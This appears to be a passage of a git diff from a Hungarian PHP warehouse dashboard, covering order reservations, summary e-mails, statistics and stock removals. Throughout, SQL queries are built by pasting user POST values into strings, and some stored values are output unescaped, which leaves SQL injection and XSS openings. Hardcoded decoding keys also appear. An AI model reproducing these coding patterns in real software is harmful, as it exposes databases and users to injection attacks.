    Csilla Haluskai
    customer relations manager

    "; + + $res_mail = sendFormattedEmail($email, $data['name'], $subject, $content); + if ($res_mail['success']) { + $sent_count++; + } + } + } else { + echo json_encode(['result'=>'error','message'=>'sendFormattedEmail nincs definiálva'], JSON_UNESCAPED_UNICODE); + exit; + } + } + } + + if (!empty($orig_ids)) { + $placeholders = implode(',', array_fill(0, count($orig_ids), '?')); + $types = str_repeat('i', count($orig_ids)); + $date_end = time(); + $sql_close = "UPDATE warehouse_reservation SET is_active = 0, date_end = $date_end WHERE reserv_id IN ($placeholders)"; + $stmt_close = $conn->prepare($sql_close); + $stmt_close->bind_param($types, ...$orig_ids); + $stmt_close->execute(); + $stmt_close->close(); + } + + $message = "$success_count tétel újrarendelve"; + if ($mode === 2) { + $message .= ", $sent_count email elküldve"; + } + echo json_encode(['result'=>'ok','message'=>$message], JSON_UNESCAPED_UNICODE); + + } + + } + /* Automata összeglő levél */ + + $sql = " + SELECT + IFNULL(order_id,'') AS order_id, + IFNULL(order_name,'') AS order_name, + IFNULL(order_mail,'') AS order_mail, + item_id, + amount, + taken_out, + receipt_method, + note, + is_active + FROM warehouse_reservation + WHERE reason = ? + AND DATE(FROM_UNIXTIME(date_create)) = ? + ORDER BY order_name, order_id, item_id + "; + $stmt = $conn->prepare($sql); + $stmt->bind_param('ss', $reason, $order_date); + $stmt->execute(); + $res = $stmt->get_result(); + + $lists = []; + $is_active = null; + while ($r = $res->fetch_assoc()) { + $is_active = $r['is_active']; + $hasOrder = $r['order_id'] !== '' || $r['order_name'] !== '' || $r['order_mail'] !== ''; + if ($hasOrder) { + $key = $r['order_id'].'|'.$r['order_name'].'|'.$r['order_mail']; + $label = $r['order_name'].' - '.$r['order_id']; + } else { + $key = 'maradek'; + $label = ''; + } + + if (!isset($lists[$key])) { + if ($hasOrder) { + $lists[$key] = [ + 'order_id' => $r['order_id'], + 'order_name' => $r['order_name'], + 'order_mail' => $r['order_mail'], + 'picking_list' => [] + ]; + } else { + $lists[$key] = [ + 'order_id' => $label, + 'order_name' => $label, + 'order_mail' => $label, + 'picking_list' => [] + ]; + } + } + + if (intval($r['taken_out']) > 0) { + $lists[$key]['picking_list'][] = [ + 'wid' => 0, + 'item_id' => $r['item_id'], + 'receipt_method' => $r['receipt_method'], + 'note' => $r['note'], + 'amount' => intval($r['taken_out']) + ]; + } + } + $stmt->close(); + + $lists = array_filter($lists, function($list) { + return !empty($list['picking_list']); + }); + $all = array_values($lists); + + // HTML táblázat generálása a kimenetre + $html_table = ''; + $html_table .= ''; + $html_table .= ''; + $html_table .= ''; + + foreach ($all as $list) { + foreach ($list['picking_list'] as $item) { + $html_table .= ''; + $html_table .= ''; + $html_table .= ''; + $html_table .= ''; + $html_table .= ''; + $html_table .= ''; + $html_table .= ''; + $html_table .= ''; + $html_table .= ''; + $html_table .= ''; + } + } + + $html_table .= '
    CikkszámMennyiségIndokRendelés azonosítóRendelés névRendelés e-mailÁtvételi módMegjegyzés
    ' . htmlspecialchars($item['item_id']) . '' . htmlspecialchars($item['amount']) . '' . htmlspecialchars($reason) . '' . htmlspecialchars($list['order_id']) . '' . htmlspecialchars($list['order_name']) . '' . htmlspecialchars($list['order_mail']) . '' . htmlspecialchars($item['receipt_method']) . '' . htmlspecialchars($item['note']) . '
    '; + + // Levél küldése + + if (!empty($html_table) && file_exists(__DIR__ . '/../managers/mail.php')) { + require_once __DIR__ . '/../managers/mail.php'; + if (function_exists('sendFormattedEmail')) { + $subject = "Lezárt rendelés - " . $reason; + + $content = "

    Tisztelt címzett!

    "; + $content .= "

    Az alábbi tételek kerültek kiadásra a(z) ". $reason . " (" . str_replace('-', '. ', $order_date) . ") rendelésből:

    "; + $content .= $html_table; + $content .= "

    Az excelbe történő beillesztéshez jelölje ki a táblázatot, másolja ki majd illesze be egy excel-be

    "; + $content .= "

    Üdvözlettel,
    Szaturnusz Rendszer

    "; + + $res_mail = sendFormattedEmail("rendeles@szatuna.hu", "Szatuna Kft", $subject, $content); + + } else { + echo json_encode(['result'=>'error','message'=>'sendFormattedEmail nincs definiálva'], JSON_UNESCAPED_UNICODE); + exit; + } + } + + } else if (htmlspecialchars($_POST["func"]) == "filter") { + + if (!isset($_COOKIE['maxperpage'])) { + setcookie("maxperpage", "25", time() + (86400 * 90), "/"); + $maxperpage = "25"; + } else { + $maxperpage = $_COOKIE['maxperpage']; + } + + setcookie("maxperpage", strval($maxperpage), time() + (86400 * 90), "/"); + + $perpageselect = " + + + + + "; + $perpageselect = str_replace("value='".$maxperpage."'", "value='".$maxperpage."' selected", $perpageselect); + + $json = json_encode(array( + 'perpage' => $perpageselect, + 'result' => 'ok' + )); + + echo $json; + } else if (htmlspecialchars($_POST["func"]) == "openreport" && UserHasPerm('warehouse_reservation')) { + $encoded = htmlspecialchars($_POST['reason'] ?? ''); + $decoded = $coderclass->decode($encoded, "SZ4TUN4"); + $parts = explode('|', $decoded); + + if (count($parts) !== 2) { + echo json_encode(['result'=>'error','message'=>'Érvénytelen azonosító'], JSON_UNESCAPED_UNICODE); + exit; + } + + $reason = $parts[0]; + $order_date = $parts[1]; + + $responseStr = ''; + $query = "SELECT * FROM warehouse_reservation WHERE reason = '$reason' and DATE(FROM_UNIXTIME(date_create)) = '$order_date' and is_active = 1"; + if ($result = $conn->query($query)) { + while ($reserv_report = $result->fetch_assoc()) { + + if ($responseStr != "") { + $responseStr .= "|%|"; + } + + $order_id = empty($reserv_report['order_id']) ? ' - ' : $reserv_report['order_id']; + $order_name = empty($reserv_report['order_name']) ? ' - ' : $reserv_report['order_name']; + $order_mail = empty($reserv_report['order_mail']) ? ' - ' : $reserv_report['order_mail']; + + $receipt_method = empty($reserv_report['receipt_method']) ? ' - ' : $reserv_report['receipt_method']; + $order_note = empty($reserv_report['note']) ? ' - ' : $reserv_report['note']; + $primary_source = empty($reserv_report['primary_source']) ? 0 : $reserv_report['primary_source']; + $primary_warehouse = empty($reserv_report['primary_warehouse']) ? "FŐ" : $reserv_report['primary_warehouse']; + + $responseStr .= $reserv_report['reason'].'/!/'.$reserv_report['amount'].'/!/'.date("Y. m. d.", $reserv_report['date_create']).'/!/'.$reserv_report['reserv_id'].'/!/'.$order_id.'/!/'.$order_name.'/!/'.$order_mail.'/!/'.$reserv_report['item_id'].'/!/'.$receipt_method.'/!/'.$order_note.'/!/'.$primary_source.'/!/'.$primary_warehouse; + } + } + + echo '{"result": "ok", "data": "'.$responseStr.'", "name_in_db": "'.$reason.'", "date": "'.str_replace('-', '. ', $order_date).'."}'; + + } else if (htmlspecialchars($_POST["func"]) == "reservitem" && UserHasPerm('warehouse_reservation_order')) { + $item_id = htmlspecialchars(str_replace(' ', '+', $_POST['item_id'])); + $amount = intval(htmlspecialchars($_POST["amount"])); + $reason = preg_replace('/[^a-zA-Z0-9áéíóöőúüűÁÉÍÓÖŐÚÜŰ .-]/u', '', htmlspecialchars($_POST["reason"])); + + $order_id = empty(htmlspecialchars($_POST["order_id"])) ? null : htmlspecialchars($_POST["order_id"]); + $order_name = empty(htmlspecialchars($_POST["order_name"])) ? null : htmlspecialchars($_POST["order_name"]); + $order_mail = empty(htmlspecialchars($_POST["order_mail"])) ? null : htmlspecialchars($_POST["order_mail"]); + + $primary_source = intval($_POST["primary_source"] ?? 0); + $amount_type = intval($_POST["amount_type"] ?? 0); + + $receipt_method = filter_var($_POST["receipt_method"] ?? '', FILTER_SANITIZE_STRING) ?: null; //Újfajta + $primary_warehouse = filter_var($_POST["primary_warehouse"] ?? '', FILTER_SANITIZE_STRING) ?: null; + $customer_type = filter_var($_POST["customer_type"] ?? '', FILTER_SANITIZE_STRING) ?: null; + $note = empty(htmlspecialchars($_POST["note"])) ? null : htmlspecialchars($_POST["note"]); + + if ($reason == "") { + echo json_encode(["result" => "Kötelező megadni egy megrendelőt vagy indoklásts!"]); + exit(); + } + + if (!filter_var($amount, FILTER_VALIDATE_INT) || intval($amount) <= 0) { + echo json_encode(["result" => "A mennyiség csak pozitív egész szám lehet!"]); + exit(); + } + + $sql = mysqli_query($conn,"SELECT item_id FROM pr_parameters WHERE item_id = '$item_id'"); + $item_id_sql = mysqli_fetch_array($sql); + if ($item_id_sql != null) { + $item_id = $item_id_sql['item_id']; + } else { + echo json_encode(["result" => "Nem létező cikkszám lett megadva!"]); + exit(); + } + + if (substr($item_id, 0, 2) !== "CL") { + $sql = mysqli_query($conn,"SELECT size, foil_product_place FROM pr_warehouse_parameters WHERE item_id = '$item_id'"); + $pr_warehouse_parameters = mysqli_fetch_array($sql); + if (!($pr_warehouse_parameters != null && ($pr_warehouse_parameters[0] != "" || $pr_warehouse_parameters[1] != ""))) { + if ($pr_warehouse_parameters == null) { + echo json_encode(["result" => "Nem létező cikkszám lett megadva!"]); + } else { + echo json_encode(["result" => "A cikkszámhoz nem lett megadva doboz méret!"]); + } + exit(); + } + } + + + if ($order_mail != null) { + $emails = array_map('trim', explode(',', $order_mail)); + foreach ($emails as $email) { + if (!filter_var($email, FILTER_VALIDATE_EMAIL)) { + echo json_encode(["result" => "Az e-mail cím helytelen formátumban van: " . $email]); + exit(); + } + } + } + + + $sql = mysqli_query($conn,"SELECT warehouse_total AS total_amount FROM statistics_daily WHERE item_id = '$item_id'"); + $total_amount_warehouse = mysqli_fetch_array($sql)[0]; + + $test_space = intval($total_amount_warehouse) - $amount; + + $time = time(); + + $sql = mysqli_query($conn,"SELECT reserv_id, amount FROM warehouse_reservation WHERE item_id = '$item_id' and reason = '$reason' and is_active = 1 and order_id = '$order_id' and order_name = '$order_name' and order_mail = '$order_mail' and DATE(FROM_UNIXTIME(date_create)) = CURDATE() and amount_type = $amount_type"); + $there_is_this_order = mysqli_fetch_array($sql); + if ($there_is_this_order != null) { + $new_amount = $amount + intval($there_is_this_order["amount"]); + $reserv_id = $there_is_this_order['reserv_id']; + $sql = mysqli_query($conn,"UPDATE warehouse_reservation SET amount = $new_amount, receipt_method = '$receipt_method', note = '$note', customer_type = '$customer_type', primary_warehouse = '$primary_warehouse', primary_source = $primary_source, amount_type = $amount_type WHERE reserv_id = '$reserv_id'"); + } else { + $sql = mysqli_query($conn,"INSERT INTO warehouse_reservation(item_id, amount, reason, is_active, date_create, order_id, order_name, order_mail, receipt_method, note, primary_source, amount_type, primary_warehouse, customer_type) VALUES ('$item_id', $amount, '$reason', 1, $time, '$order_id', '$order_name', '$order_mail','$receipt_method', '$note', $primary_source, $amount_type, '$primary_warehouse', '$customer_type')"); + } + + echo json_encode(["result" => "ok", "rest" => $test_space]); + + $_GET['type'] = 'daily'; + $_GET['item_id'] = $item_id; + $_GET['silent'] = true; + include '../managers/statistics.php'; + + } else if (htmlspecialchars($_POST["func"]) == "deleteReservation" && UserHasPerm('warehouse_reservation_order')) { + $taken_out = null; + if (isset($_POST["reserv_id"])) { + $reserv_id = htmlspecialchars($_POST["reserv_id"]); + $sql = mysqli_query($conn,"SELECT taken_out FROM warehouse_reservation WHERE reserv_id = '$reserv_id'"); + $taken_out = mysqli_fetch_array($sql)[0]; + + $date_end = time(); + $sql = mysqli_query($conn,"UPDATE warehouse_reservation SET is_active = 0, date_end = $date_end, is_deleted = 1 WHERE reserv_id = '$reserv_id'"); + + } else { + $encoded = htmlspecialchars($_POST['reason'] ?? ''); + $decoded = $coderclass->decode($encoded, "SZ4TUN4"); + $parts = explode('|', $decoded); + + if (count($parts) !== 2) { + echo json_encode(['result'=>'error','message'=>'Érvénytelen azonosító'], JSON_UNESCAPED_UNICODE); + exit; + } + + $reason = $parts[0]; + $order_date = $parts[1]; + + $sql = mysqli_query($conn,"SELECT taken_out FROM warehouse_reservation WHERE reason = '$reason' and DATE(FROM_UNIXTIME(date_create)) = '$order_date' and is_active = 1"); + $taken_out = mysqli_fetch_array($sql)[0]; + + $date_end = time(); + $sql = mysqli_query($conn,"UPDATE warehouse_reservation SET is_active = 0, date_end = $date_end, is_deleted = 1 WHERE reason = '$reason' and DATE(FROM_UNIXTIME(date_create)) = '$order_date' and is_active = 1"); + } + + echo json_encode(["result" => "ok", "taken_out" => $taken_out]); + } else if (htmlspecialchars($_POST["func"]) == "statistics") { + $countSql = "SELECT COUNT(DISTINCT CONCAT(reason, '|', DATE(FROM_UNIXTIME(date_create)))) as total + FROM warehouse_reservation WHERE is_active = 1"; + $totalRes = $conn->query($countSql); + $totalOrders = $totalRes->fetch_assoc()['total']; + + $sql_reasons = "SELECT DISTINCT reason, DATE(FROM_UNIXTIME(date_create)) as order_date + FROM warehouse_reservation WHERE is_active = 1"; + $res1 = $conn->query($sql_reasons); + + $classic = ['canFulfill' => 0, 'cantFulfill' => 0]; + $sporty = ['canFulfill' => 0, 'cantFulfill' => 0]; + $injmold = ['canFulfill' => 0, 'cantFulfill' => 0]; + $climair = ['canFulfill' => 0, 'cantFulfill' => 0]; + + $instock = []; + + while ($row = $res1->fetch_assoc()) { + $reason = $row['reason']; + $order_date = $row['order_date']; + + $itemsSql = "SELECT item_id, SUM(amount - COALESCE(taken_out, 0)) as remaining + FROM warehouse_reservation + WHERE reason = ? AND DATE(FROM_UNIXTIME(date_create)) = ? AND is_active = 1 + GROUP BY item_id"; + $stmt = $conn->prepare($itemsSql); + $stmt->bind_param('ss', $reason, $order_date); + $stmt->execute(); + $itemsRes = $stmt->get_result(); + + $canFulfill = true; + + while ($itemRow = $itemsRes->fetch_assoc()) { + $item_id = $itemRow['item_id']; + $itemRemaining = intval($itemRow['remaining']); + + if ($itemRemaining <= 0) continue; + + if (!isset($instock[$item_id])) { + $sql = mysqli_query($conn,"SELECT warehouse_total FROM statistics_daily WHERE item_id = '$item_id'"); + $result = mysqli_fetch_array($sql); + if ($result == null) { + $sql = mysqli_query($conn, "SELECT SUM(amount) AS total_amount FROM warehouse WHERE item_id = '$item_id' GROUP BY item_id"); + $result = mysqli_fetch_array($sql); + } + $instock[$item_id] = $result ? intval($result[0]) : 0; + } + + $available_stock = $instock[$item_id]; + $prefix = explode('+', $item_id)[0]; + + if (preg_match('/^[0-9]+$/', $prefix)) { + $classic[$available_stock < $itemRemaining ? 'cantFulfill' : 'canFulfill'] += $itemRemaining; + } elseif (preg_match('/^CL[P|M]?[0-9]+$/', $prefix)) { + $climair[$available_stock < $itemRemaining ? 'cantFulfill' : 'canFulfill'] += $itemRemaining; + } elseif (preg_match('/^FR[0-9]{4}$/', $prefix)) { + $injmold[$available_stock < $itemRemaining ? 'cantFulfill' : 'canFulfill'] += $itemRemaining; + } elseif (preg_match('/^F[0-9]{4}$/', $prefix)) { + $sporty[$available_stock < $itemRemaining ? 'cantFulfill' : 'canFulfill'] += $itemRemaining; + } + + } + + } + + echo json_encode([ + 'result' => 'ok', + 'classic' => $classic, + 'sporty' => $sporty, + 'injmold' => $injmold, + 'climair' => $climair + ], JSON_UNESCAPED_UNICODE ); + + } + + + exit(); +} else if (isset($_GET["saving"]) && $_GET["saving"] == 1 && UserHasPerm('warehouse_reservation_order')) { + header("Content-Type: application/json"); + + $input = file_get_contents('php://input'); + $tableData = json_decode($input, true); + + if (!empty($tableData)) { + + $errors = ""; + $lines = ""; + + for ($i = 0; $i < count($tableData); $i++) { + $row = $tableData[$i]; + + $time = time(); + $item_id = $row['item_id']; + $amount = $row['amount']; + + $note = $row['note']; + $receipt_method = $row['receipt_method']; + $primary_source = $row['primary_source']; + $primary_warehouse = $row['primary_warehouse']; + $customer_type = $row['customer_type']; + + $reason = preg_replace('/[^a-zA-Z0-9áéíóöőúüűÁÉÍÓÖŐÚÜŰ .-]/u', '', htmlspecialchars($row["reason"])); + + $order_id = empty(htmlspecialchars($row["order_id"])) ? null : htmlspecialchars($row["order_id"]); + $order_name = empty(htmlspecialchars($row["order_name"])) ? null : htmlspecialchars($row["order_name"]); + $order_mail = empty(htmlspecialchars($row["order_mail"])) ? null : htmlspecialchars($row["order_mail"]); + + if ($reason == "") { + $errors .= "|#".$row['line']." - Kötelező megadni egy megrendelőt vagy indoklásts!"; + $lines .= "|reserv_table-".$row['line']."-row"; + continue; + } + + if (!filter_var($amount, FILTER_VALIDATE_INT) || intval($amount) <= 0) { + $errors .= "|#".$row['line']." - A mennyiség csak pozitív egész szám lehet!"; + $lines .= "|reserv_table-".$row['line']."-row"; + continue; + } + + if ($order_mail != null) { + $emails = array_map('trim', explode(',', $order_mail)); + foreach ($emails as $email) { + if (!filter_var($email, FILTER_VALIDATE_EMAIL)) { + $errors .= "|#".$row['line']." - Az e-mail cím helytelen formátumban van: ".$email; + $lines .= "|reserv_table-".$row['line']."-row"; + continue 2; + } + } + } + + $sql = mysqli_query($conn,"SELECT item_id FROM pr_parameters WHERE item_id = '$item_id'"); + $item_id_sql = mysqli_fetch_array($sql); + if ($item_id_sql != null) { + $item_id = $item_id_sql['item_id']; + } else { + $errors .= "|#".$row['line']." - Nem létező cikkszám lett megadva!"; + $lines .= "|reserv_table-".$row['line']."-row"; + continue; + } + + if (substr($item_id, 0, 2) !== "CL") { + $sql = mysqli_query($conn,"SELECT size, foil_product_place FROM pr_warehouse_parameters WHERE item_id = '$item_id'"); + $pr_warehouse_parameters = mysqli_fetch_array($sql); + if (!($pr_warehouse_parameters != null && ($pr_warehouse_parameters[0] != "" || $pr_warehouse_parameters[1] != ""))) { + if ($pr_warehouse_parameters == null) { + $errors .= "|#".$row['line']." - Nem létező cikkszám!"; + } else { + $errors .= "|#".$row['line']." - A cikkszámhoz nem lett megadva doboz méret!"; + } + $lines .= "|reserv_table-".$row['line']."-row"; + continue; + } + } + + $sql = mysqli_query($conn,"SELECT reserv_id, amount FROM warehouse_reservation WHERE item_id = '$item_id' and reason = '$reason' and is_active = 1 and order_id = '$order_id' and order_name = '$order_name' and order_mail = '$order_mail' and DATE(FROM_UNIXTIME(date_create)) = CURDATE()"); + $there_is_this_order = mysqli_fetch_array($sql); + if ($there_is_this_order != null) { + $new_amount = $amount + intval($there_is_this_order["amount"]); + $reserv_id = $there_is_this_order['reserv_id']; + $sql = mysqli_query($conn,"UPDATE warehouse_reservation SET amount = $new_amount, receipt_method = '$receipt_method', note = '$note', customer_type = '$customer_type', primary_warehouse = '$primary_warehouse', primary_source = $primary_source WHERE reserv_id = '$reserv_id'"); + } else { + $sql = mysqli_query($conn,"INSERT INTO warehouse_reservation(item_id, amount, reason, is_active, date_create, order_id, order_name, order_mail, receipt_method, note, primary_source, primary_warehouse, customer_type) VALUES ('$item_id', $amount, '$reason', 1, $time, '$order_id', '$order_name', '$order_mail', '$receipt_method', '$note', $primary_source, '$primary_warehouse', '$customer_type')"); + } + + } + + $_GET['type'] = 'daily'; + $_GET['item_id'] = $item_id; + $_GET['silent'] = true; + include '../managers/statistics.php'; + + if ($errors == "") { + echo json_encode(["status" => "done"]); + } else { + echo json_encode(["status" => "error", "message" => substr($errors, 1), "line" => substr($lines, 1)]); + } + } else { + echo json_encode(["status" => "error", "message" => "Hibás adat", "line" => ""]); + } + + exit(); +} + +$customer_type_selector = ''; +$query = "SELECT DISTINCT type_name FROM customer_types ORDER BY type_name ASC"; +if ($result = $conn->query($query)) { + while ($customer_type_sql = $result->fetch_assoc()) { + $customer_type_selector .= ''; + } +} +$customer_type_selector = str_replace('value="Magyar web"', 'value="Magyar web" SELECTED', $customer_type_selector); + +?> + + + + + + + + Kezelőfelület + + + + +
    +
    +

    Title

    +
    +
    +
    +
    +
    +
    +
    +
    +
    + + + +

    Rendelések

    + + + + marketing + + +
    +
    +

    Rendelés neve / Indoklás:

    + +
    +

    Rendezési szempont:

    + +
    +

    Dátum kiválasztása:

    + +
    +

    Rendelés állapota:

    + +
    +

    Kiszedhetőség:

    + +
    +

    Oldalanként:

    + +
    +

    :

    + +
    + +

    :

    :

    '; + } + ?> +
    + +
    +
    +
    + +
    +
    + + + + + + + + + + + +
    Rendelés neve / IndoklásCikkszámMennyiség (Kiszedve / Igény)Műveletek
    +
    +
    + +
    +
    +

    +

    <    0 / 0    >

    +
    + +
    +
    +
    + +


    + + + + + + + + + diff --git a/dashboard/wh_remove.php b/dashboard/wh_remove.php new file mode 100644 index 0000000..c2774ff --- /dev/null +++ b/dashboard/wh_remove.php @@ -0,0 +1,991 @@ +25 db / oszlop + + + + + "; + $perpageselect = str_replace("value='".$maxperpage."'", "value='".$maxperpage."' selected", $perpageselect); + + $UserItems = []; + $query = "SELECT full_name, uid FROM users"; + if ($result = $conn->query($query)) { + while ($cuser = $result->fetch_assoc()) { + + $Current_full_name = $coderclass->decode($cuser['full_name'], 'TIT4'); + $UserItems[] = [ 'full_name' => $Current_full_name, 'uid' => $cuser['uid'] ]; + } + } + + usort($UserItems, function ($a, $b) { + return strcoll($a['full_name'], $b['full_name']); + }); + + $userselect = ''; + for ($i=0; $i < count($UserItems); $i++) { + $cval = $UserItems[$i]['full_name'] . " - " . $coderclass->encode($UserItems[$i]['uid'], 'RM'); + $userselect .= ''; + } + + $json = json_encode(array( + 'perpage' => $perpageselect, + 'userselect' => $userselect, + 'result' => 'ok' + )); + + echo $json; + } else if (htmlspecialchars($_POST["func"]) == 'CreateRemoval') { + $category = $_POST['category'] ?? ''; + $rawData = $_POST['data'] ?? ''; + $allowedCategories = ['warranty', 'scrap', 'employee']; + + if (!in_array($category, $allowedCategories, true)) { + echo 'Érvénytelen kategória'; + exit; + } + + $jsonData = json_decode($rawData, true); + if (!is_array($jsonData)) { + echo 'Hibás adatstruktúra'; + exit; + } + + $itemIdValue = null; + foreach ($jsonData as $param) { + if ($param['name'] === 'item_id') { + $itemIdValue = $param['value']; + break; + } + } + + if ($itemIdValue == null) { + echo 'Hibás adatstruktúra'; + exit; + } else { + $sql = mysqli_query($conn,"SELECT name_in_db FROM pr_parameters WHERE item_id = '$itemIdValue'"); + $pr_parameters = mysqli_fetch_array($sql); + if ($pr_parameters == null) { + echo 'Nem létező cikkszámot adott meg!'; + exit; + } + } + + $table = $conn->real_escape_string("{$category}_removal"); + + $time = time(); + mysqli_query($conn, "INSERT INTO $table (date_create) VALUES ($time)"); + $rid = mysqli_insert_id($conn); + + + foreach ($jsonData as $item) { + if (!isset($item['name'], $item['value'])) { + continue; + } + $paramName = $item['name']; + $paramValue = $item['value']; + + if (!preg_match('/^[a-z_]+$/', $paramName)) { + continue; + } + + if ($paramValue === '$[TIMESTAMP]') { + $paramValue = time(); + $type = 'i'; + } else { + $paramValue = htmlspecialchars($paramValue, ENT_QUOTES, 'UTF-8'); + $type = 's'; + } + + if ($paramName === 'uid') { + $paramValue = $coderclass->decode($paramValue, "RM"); + } + + $column = $conn->real_escape_string($paramName); + $sql = "UPDATE `{$table}` SET `{$column}` = ? WHERE `{$category}_rid` = ?"; + $stmt = $conn->prepare($sql); + + if (!$stmt) { + continue; + } + + $stmt->bind_param($type . 'i', $paramValue, $rid); + $stmt->execute(); + $stmt->close(); + } + echo 'ok'; + } else if (htmlspecialchars($_POST["func"]) == "table") { + $category = $_POST['category'] ?? ''; + $rawData = $_POST['data'] ?? ''; + $allowedCategories = ['warranty', 'scrap', 'employee']; + + if (!in_array($category, $allowedCategories, true)) { + echo '{"result": "Érvénytelen kategória"}'; + exit; + } + + $maxperpage = intval(htmlspecialchars($_POST["perpage"])); + $cpage = intval(htmlspecialchars($_POST["cpage"])); + + $start_datetime = htmlspecialchars($_POST["start_datetime"]); + $end_datetime = htmlspecialchars($_POST["end_datetime"]); + $name = htmlspecialchars($_POST["name"]); + $item_id = htmlspecialchars(str_replace(' ', '+', $_POST['item_id'])); + + $addquery = ""; + $isfirst = true; + + if ($cpage == 0) { + $cpage = 1; + } + setcookie("maxperpage", $maxperpage, time() + (86400 * 90), "/"); + + if ($name != "" && $category != "scrap") { + $addquery = $addquery." WHERE name LIKE '%".$name."%'"; + $isfirst = false; + } else if ($name != "") { + $addquery = $addquery." WHERE wh_id LIKE '%".$name."%'"; + $isfirst = false; + } + + if ($start_datetime != "") { + $timestamp = strtotime($start_datetime); + + if ($isfirst) { + $addquery = $addquery." WHERE date_create > '".$timestamp."'"; + $isfirst = false; + } else { + $addquery = $addquery." and date_create > '".$timestamp."'"; + } + } + + if ($end_datetime != "") { + $timestamp = strtotime($end_datetime); + + if ($isfirst) { + $addquery = $addquery." WHERE date_create < '".$timestamp."'"; + $isfirst = false; + } else { + $addquery = $addquery." and date_create < '".$timestamp."'"; + } + } + + if ($item_id != "") { + if ($isfirst) { + $addquery = $addquery." WHERE item_id LIKE '%".$item_id."%'"; + $isfirst = false; + } else { + $addquery = $addquery." and item_id LIKE '%".$item_id."%'"; + } + } + + $table = $conn->real_escape_string("{$category}_removal"); + + $sql = mysqli_query($conn,"SELECT COUNT(*) FROM ".$table.$addquery); + $count = mysqli_fetch_array($sql)[0]; + + $addquery = $addquery." ORDER BY date_create DESC"; + + $maxpage = ceil($count / $maxperpage); + if (!($cpage >= 1 && $cpage <= $maxpage)) { + $cpage = 1; + } + + $limit = ($cpage - 1) * $maxperpage; + + $responseStr = ''; + $isnamequery = ($category === "scrap") ? 'wh_id' : 'name'; + $ridquery = $category."_rid"; + + $query = "SELECT $ridquery, $isnamequery, item_id, date_create, right_db, left_db FROM $table".$addquery." LIMIT $limit, $maxperpage"; + if ($result = $conn->query($query)) { + while ($c_removal = $result->fetch_assoc()) { + + if ($responseStr != "") { + $responseStr .= "|%|"; + } + $responseStr .= $c_removal[$isnamequery].'/!/'.$c_removal['item_id'].'/!/'.date("Y. m. d.", $c_removal['date_create']).'/!/'.$c_removal['right_db'].'/!/'.$c_removal['left_db'].'/!/'.$c_removal[$ridquery]; + } + } + + echo '{"result": "ok", "data": "'.$responseStr.'", "maxpage": "'.$maxpage.'", "cpage": "'.$cpage.'"}'; + + } else if (htmlspecialchars($_POST["func"]) == "OpenInfo") { + $category = $_POST['category'] ?? ''; + $allowedCategories = ['warranty', 'scrap', 'employee']; + $rid = intval(htmlspecialchars($_POST["rid"])); + + if (!in_array($category, $allowedCategories, true)) { + echo '{"result": "Érvénytelen kategória"}'; + exit; + } + + $table = $conn->real_escape_string("{$category}_removal"); + + $NameTranslate = [ + "warranty" => "Garanciális ügyintézés", + "scrap" => "Selejt kivét", + "employee" => "Dolgozói kivét", + "name" => "Ügyfél / Raktár / Dolgozó neve", + "mail" => "Email", + "order_id" => "Rendelés azonosító", + "item_id" => "Cikkszám", + "right_db" => "Jobb oldal db", + "left_db" => "Bal oldal db", + "reason" => "Kivét / Selejt oka", + "note" => "Megjegyzés", + "date_create" => "Dátum", + "wh_id" => "Raktárhely" + ]; + + $sql = mysqli_query($conn,"SELECT * FROM $table WHERE ".$category."_rid = $rid"); + $result = mysqli_fetch_array($sql); + + $html = '

    '.$NameTranslate[$category].'

    '; + + if ($result != null) { + foreach ($result as $paramName => $value) { + if (array_key_exists($paramName, $NameTranslate)) { + $cvalue = $value; + if ($paramName == "date_create") { + $cvalue = date("Y. m. d. h:i:s", $value); + $html .= '
    '.$NameTranslate[$paramName].': '.$cvalue.'
    '; + continue; + } + $html .= ''.$NameTranslate[$paramName].': '.$cvalue.'
    '; + } + } + $html .= '

    '; + } else { + echo '{"result": "Érvénytelen azonosító"}'; + exit; + } + + echo json_encode(array( + 'html' => $html, + 'result' => 'ok' + )); + + } else if (htmlspecialchars($_POST["func"]) == "ScrapRemoval") { + $item_id = htmlspecialchars($_POST["item_id"]); + $left = intval(htmlspecialchars($_POST["left"])); + $right = intval(htmlspecialchars($_POST["right"])); + $warehouse_code = htmlspecialchars($_POST["warehouse_code"]); + + $sql = mysqli_query($conn,"SELECT wid FROM warehouse_foil WHERE item_id = '$item_id' and place LIKE '%$warehouse_code%' AND is_active = 1"); + $foil_warehouse = mysqli_fetch_array($sql); + + if ($foil_warehouse != null) { + $left_db = -$left; + $right_db = -$right; + + $wid = $foil_warehouse['wid']; + + $sql = mysqli_query($conn,"UPDATE warehouse_foil SET left_db = CASE WHEN left_db + $left_db < 0 THEN 0 ELSE left_db + $left_db END, right_db = CASE WHEN right_db + $right_db < 0 THEN 0 ELSE right_db + $right_db END WHERE wid = '$wid'"); + + $loggerclass->writeLogWarehouse(['reason' => 'Kivét selejt miatt', 'reason_code' => 1, + 'item_id' => $item_id, + 'from_place' => $warehouse_code, + 'to_place' => '', + 'amount_left' => $left, + 'amount_right' => $right + ]); + } else { + $position = substr($warehouse_code, -3); + $wcode = substr($warehouse_code, 0, strlen($warehouse_code) - 3); + + $letter = $position[0]; + $numberFromLetter = ord(strtoupper($letter)) - ord('A') + 1; + $number = ltrim(substr($position, 1, 2), '0'); + $position = $numberFromLetter . ':' . $number; + + $sql = mysqli_query($conn,"SELECT warehouse_id FROM warehouse_structure WHERE code = '$wcode'"); + $warehouse_structure = mysqli_fetch_array($sql); + + if ($warehouse_structure != null) { + $warehouse_id = $warehouse_structure['warehouse_id']; + + $sql = mysqli_query($conn,"SELECT wid FROM warehouse WHERE warehouse_id = '$warehouse_id' and item_id = '$item_id' and position = '$position'"); + $warehouse_box = mysqli_fetch_array($sql); + + if ($warehouse_box != null) { + $box_db = -max($left, $right); + $wid = $warehouse_box['wid']; + $sql = mysqli_query($conn,"UPDATE warehouse SET amount = CASE WHEN amount + $box_db < 0 THEN 0 ELSE amount + $box_db END WHERE wid = '$wid'"); + + $loggerclass->writeLogWarehouse(['reason' => 'Kivét selejt miatt', 'reason_code' => 1, + 'item_id' => $item_id, + 'from_place' => $warehouse_code, + 'to_place' => '', + 'amount_left' => $box_db, + 'amount_right' => $box_db + ]); + } else { + echo json_encode(array( + 'result' => 'A cikkszám nem található meg ezen a raktárazonosítón!' + )); + exit(); + } + } else { + echo json_encode(array( + 'result' => 'Nem létező raktár azonosítót adott meg!' + )); + exit(); + } + } + + echo json_encode(array( + 'result' => 'ok' + )); + } + + exit; +} + +?> + + + + + + + Kezelőfelület + + + +
    +
    +

    Title

    +
    +
    +
    +
    +
    +
    +
    +
    +
    + + + + +
